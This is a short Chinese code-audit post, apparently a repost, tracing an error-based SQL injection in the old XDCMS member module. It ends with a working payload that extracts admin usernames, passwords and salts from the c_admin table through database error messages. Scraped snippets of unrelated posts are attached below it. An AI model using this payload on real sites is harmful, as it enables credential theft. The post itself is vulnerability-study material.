2. 程式人生 > >【代碼審計】XDCMS 報錯註入

【代碼審計】XDCMS 報錯註入

阿新 發佈:2017-05-14
信息 輸入 alt 變量 出現 img 語句 limit lec

  審計的都是之前很老的一些的CMS,把學習的過程分享出來,如果有正在和我一起學習的兄弟們,希望看到文章之後會有所收獲

--------------------------------------------------------------------------------------------------------------------------------------

在system/moudles/member/index.php中

技術分享

上述代碼可以看到$fields 沒有被過濾,跟蹤$fields這個變量。

在83行把重新組合的值傳入到 $field_sql中,繼續跟蹤$field_sql 這個變量

技術分享

我們跟蹤query這個函數 在system/libs/mysql.class.php中

技術分享

如果操作失敗,會出現一些錯誤信息。這裏我們輸入語句就會顯示賬號密碼

技術分享

參考EXP:

(select 1 from(select count(*),concat((select (select (select concat(0x7e,0x27,username,0x3a,password,0x3a,encrypt,0x27,0x7e)
from c_admin limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2)) x from
 
 information_schema.tables group by x)a)#

【代碼審計】XDCMS 報錯註入

相關推薦

審計XDCMS

信息 輸入 alt 變量 出現 img 語句 limit lec   審計的都是之前很老的一些的CMS,把學習的過程分享出來,如果有正在和我一起學習的兄弟們,希望看到文章之後會有所收獲 --------------------------------------------

審計VAuditDemo 重裝漏洞

demo http ima 重裝 config 退出 網站安全 執行 知識 一、源碼安裝漏洞介紹   一般在PHP源碼程序都有一個初始安裝的功能,如果相關代碼沒有對參數進行嚴格過濾,可能會導致攻擊者訪問安裝頁面(install.php)或構造數據包,對網站進行重新安裝,從而

審計VAuditDemo 文件包含漏洞

http code 頭像 col 函數 文件名 中一 判斷 包含漏洞 在 index.php中先判斷get過來的module是否設置了變量,如果已經設置,則包含module,並與字符串.inc拼接 inc格式一般是圖標或者頭像格式,因此我們可以初步判斷,這個包含應該是基於

審計VAuditDemo 後臺登錄功能驗證繞過

-1 php 審計 use 存在 功能 post nbsp logs 在 admin/logCheck.php中 $_POST[‘user‘]和$_POST[‘pass‘] 未經過任何過濾或者編碼處理就傳入到$query中,可能存在萬能密碼繞過機制 但是$pass經過了加

審計兩個任意文件讀取漏洞實例

狀態 內容 cfg 必須 名稱 ror div 完整 FN 0x00 前言 0x01 漏洞實例一 環境搭建: XYHCMS官網:http://www.xyhcms.com/ 網站源碼版本:XYHCMS V3.5(2017-12-04 更新) 程序源碼下載:https:

審計Spring Integration Zip不安全解壓(CVE-2018-1261)漏洞分析

圖片 ssa clas port als put gets 9.png after 1.漏洞相關信息 漏洞名稱:Spring Integration Zip不安全解壓 漏洞編號:CVE-2018-1261 漏洞描述:在spring-integration-zip.v1.0.

審計CLTPHP_v5.5.3後臺任意文件下載漏洞分析

func attach database 9.png jpg 允許 left 簡單 服務 0x00 環境準備 CLTPHP官網:http://www.cltphp.com 網站源碼版本:CLTPHP內容管理系統5.5.3版本 程序源碼下載:https://git

審計CLTPHP_v5.5.3後臺任意文件刪除漏洞分析

login alt flag div 網站源碼 用戶 urn 測試 result 0x00 環境準備 CLTPHP官網:http://www.cltphp.com 網站源碼版本:CLTPHP內容管理系統5.5.3版本 程序源碼下載:https://gitee.c

XerCMS-1.0.3審計(文件名後臺getshell)

each orb his jpg pla module 將不 last self 鏈接:https://share.weiyun.com/6b98e41d036967178e1a21fb88ed340f (密碼:YnNY) 文件名報錯註入 index.php?m=memb

學習PHP面向對象之抽象類與接口

部分 truct 中國人 protect nds 16px 使用 function col 一、什麽是抽象方法?   一個方法如果沒有方法體(不使用"{}",直接使用分號結束的方法,才是沒有方法體的方法),則這個方法就是抽象方法 1、聲明一個方法,不使用{},而直接分號結束

學習PYHTON 元組

ext test .py logs 最大 最大值 不同 trace pytho Python的元組與列表類似,不同之處在於元組的元素不能修改。也可進行分片 和 連接操作. 元組使用小括號,列表使用方括號。 一、訪問元組 #coding=utf-8 Tuple = (‘na

學習PYTHON 異常處理

上下文 當前 異常處理 通過 工作 相同 try語句 標記 異常信息 一、什麽是異常   在程序執行過程中可能會影響程序的正常執行,一般情況下,在python無法正常處理程序時就會發生一個異常   當python腳本發生異常時我們需要捕獲處理他,否則程序會終止執行 二、異常

優化考慮使用靜態工廠方法取代構造器

ava tracking 什麽事 依據 mod true data -m span 靜態工廠方法與設計模式中的工廠方法模式不同,和設計模式中的工廠方法模式不直接相應。 使用靜態工廠方法比構造器的優勢: 第一、靜態工廠方法是有名稱的,而構造器是通過

學習PYTHON 生成器

eat 生成式 運行 進行 tar temp next 如果 for 一、生成器 一遍循環一遍計算的機制,稱為生成器 二、生成器的特點: 1、節約內存 2、叠代到下一次的調用時,所使用的參數都是第一次所保留下的,即是說,在整個所有函數調用的參數都是第一次所調用時保留的,而不

學習PYTHON 線程

結果 延時 odin num 16px time 調用 art 使用 一、使用threading模塊多線程執行 可以明顯看出使用了多線程並發的操作,花費時間要短很多 創建好的線程,需要調用start()方法來啟動 #coding=utf-8 import thread

學習角色添加權限的方法,先刪除,再添加。而不是用修改,這樣很方便。

方便 添加權限 public resource res bject void @override != @Overridepublic void addRoleResources(Resources[] resources, Long roleId) { Map<

-- 三級菜單 (基礎版)

ddd date small 代碼段 -- inpu blog 河北 style # __author__:"ShengXin" # __date__:2017/8/24 full_menu = {‘河北省‘:{‘張家口市‘:[‘蔚縣‘,‘涿鹿縣‘,‘懷來縣‘,‘陽原縣‘

片段如何使用CSS來快速定義多彩光標

css代碼 ref bottom pla network 設置 orange 需要 css 對於web開發中,我們經常都看得到需要輸入內容的組件和元素,比如,textarea,或者可編輯的DIV(contenteditable) ,如果你也曾思考過使用相關方式修改一下光

學習Spring MVC實現用戶註冊功能

技術分享 http請求 pac 應用 idea c-s dap 適配器 新建項目 1.實驗介紹 -----------------------------------------------------------------------------------------

sqli-labs less19 POST - Header Injection - Referer field - Error based (基於頭部的Referer POST)

span word form where sch select 技術 分享 less 這個和less18一樣,都是基於header的註入 這次的字段是referer Referer: 123‘ AND UpdateXml(1,concat(0x7e,database()